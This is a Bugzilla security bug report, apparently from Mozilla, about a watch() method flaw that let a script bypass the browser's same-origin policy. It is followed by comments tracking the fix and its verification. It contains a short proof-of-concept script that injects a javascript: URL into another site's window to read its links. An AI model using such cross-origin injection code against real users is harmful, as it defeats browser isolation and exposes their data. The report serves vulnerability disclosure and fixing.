watch() and bookmarks vulnerability

VERIFIED FIXED in M16

Status

()

Core
Security
P3
normal
VERIFIED FIXED
18 years ago
18 years ago

People

(Reporter: Norris Boyd, Assigned: Norris Boyd)

Tracking

Trunk
x86
Windows NT
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(URL)

(Assignee)

Description

18 years ago
Subject: 
        BUG: watch() and bookmarks vulnerability
   Date: 
        Fri, 18 Feb 2000 16:13:34 +0200
   From: 
        Georgi Guninski <joro@nat.bg>
     To: 
        Norris Boyd <norris@netscape.com>




The watch() method when applied to window.location.href allows
circumventing Same Origin security policy.
But user interaction is required - selecting any bookmark from the menu
of the target window.
The code is:
-------------------------------------------------
Select a bookmark from the menu of the other window.
<SCRIPT>
a=window.open("http://www.yahoo.com","victim");
a.location.watch("href",function (id,oldval,newval) { return
"javascript:alert('The first link is:' +document.links[0].href)"; });
</SCRIPT>
-------------------------------------------------


watch() vulnerability. 
Select a bookmark from the menu of the other window.
(Assignee)

Updated

18 years ago
Group: netscapeconfidential?
Status: NEW → ASSIGNED
Target Milestone: M15

Comment 1

18 years ago
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
(Assignee)

Updated

18 years ago
Keywords: beta2

Comment 2

18 years ago
Moving to M16 so that M15 can branch.
Target Milestone: M15 → M16
(Assignee)

Comment 3

18 years ago
Add test case.
(Assignee)

Comment 4

18 years ago
Fix checked in.
Status: ASSIGNED → RESOLVED
Last Resolved: 18 years ago
Resolution: --- → FIXED

Comment 5

18 years ago
Norris - what is the expected behavior? What I see with Seamonkey is that when 
selecting a bookmark in the second window, nothing happens. With Nova, the 
bookmark selected is opened in the new window.

Updated

18 years ago
Keywords: nsbeta2

Comment 6

18 years ago
Verified.
Status: RESOLVED → VERIFIED
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.